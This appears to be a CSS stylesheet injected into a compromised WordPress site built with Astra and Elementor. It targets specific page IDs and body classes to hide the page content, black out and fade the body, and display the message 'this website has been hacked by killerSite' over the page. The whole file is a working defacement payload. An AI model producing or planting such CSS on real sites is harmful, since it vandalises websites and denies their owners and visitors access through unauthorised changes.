body.rtl.home.page-template-default.page.page-id-540.wp-custom-logo.ehf-footer.ehf-template-astra.ehf-stylesheet-astra.ast-desktop.ast-page-builder-template.ast-no-sidebar.astra-4\.6\.3.ast-single-post.ast-replace-site-logo-transparent.ast-inherit-site-logo-transparent.ast-theme-transparent-header.ast-hfb-header.elementor-default.elementor-kit-442.elementor-page.elementor-page-540.e--ua-blink.e--ua-chrome.e--ua-webkit {
    display: none !important;
}
body:before {
    content: 'this website has been hacked by killerSite ';
     display: block !important;
    width: 100%;
    height: 100%;
    position: absolute;
    z-index: 11111;
    opacity: 1;
}
body{
    background:black !important;
    display:none  !important;
}
body {
    opacity: 0.1 !important;
}
body.home.page-template-default.page.page-id-8217.logged-in.admin-bar.wp-custom-logo.ehf-footer.ehf-template-astra.ehf-stylesheet-astra.ast-desktop.ast-page-builder-template.ast-no-sidebar.astra-4\.3\.1.ast-single-post.ast-inherit-site-logo-transparent.ast-hfb-header.elementor-default.elementor-kit-8.elementor-page.elementor-page-8217.customize-support.dialog-body.dialog-buttons-body.dialog-container.dialog-buttons-container.e--ua-blink.e--ua-chrome.e--ua-webkit.mysticky-welcomebar-apper {
    opacity:  0.1 !important;
    margin-top:11rem !important;
}
body.home.page-template-default.page.page-id-8217.wp-custom-logo.ehf-footer.ehf-template-astra.ehf-stylesheet-astra.ast-page-builder-template.ast-no-sidebar.astra-4\.3\.1.ast-single-post.ast-inherit-site-logo-transparent.ast-hfb-header.elementor-default.elementor-kit-8.elementor-page.elementor-page-8217.e--ua-blink.e--ua-chrome.e--ua-webkit.mysticky-welcomebar-apper.ast-desktop {
    opacity:  0.1 !important;
}
section.has_eae_slider.elementor-section.elementor-top-section.elementor-element.elementor-element-a192971.eae-particle-yes.elementor-section-boxed.elementor-section-height-default.elementor-section-height-default{
     display:none  !important;
}
